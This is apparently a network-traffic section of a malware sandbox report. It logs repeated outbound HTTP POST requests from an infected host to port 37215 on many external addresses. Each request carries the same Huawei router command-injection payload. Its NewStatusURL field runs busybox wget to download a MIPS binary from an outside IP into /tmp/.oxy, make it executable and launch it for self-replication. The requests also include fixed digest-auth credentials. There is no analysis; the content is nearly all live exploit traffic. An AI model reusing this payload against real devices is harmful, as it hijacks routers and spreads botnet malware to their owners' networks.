                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  445192.168.2.1356000197.139.178.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278294086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  446192.168.2.1350954197.126.125.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281321049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  447192.168.2.134603441.210.209.4437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281361103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  448192.168.2.1337888157.235.19.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281409025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  449192.168.2.134007032.66.76.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281445980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  450192.168.2.1337502157.162.28.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281454086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  451192.168.2.1349678157.116.76.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281483889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  452192.168.2.135835841.228.149.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281493902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  453192.168.2.1356430157.113.23.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281641960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  454192.168.2.136028441.51.132.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281651974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 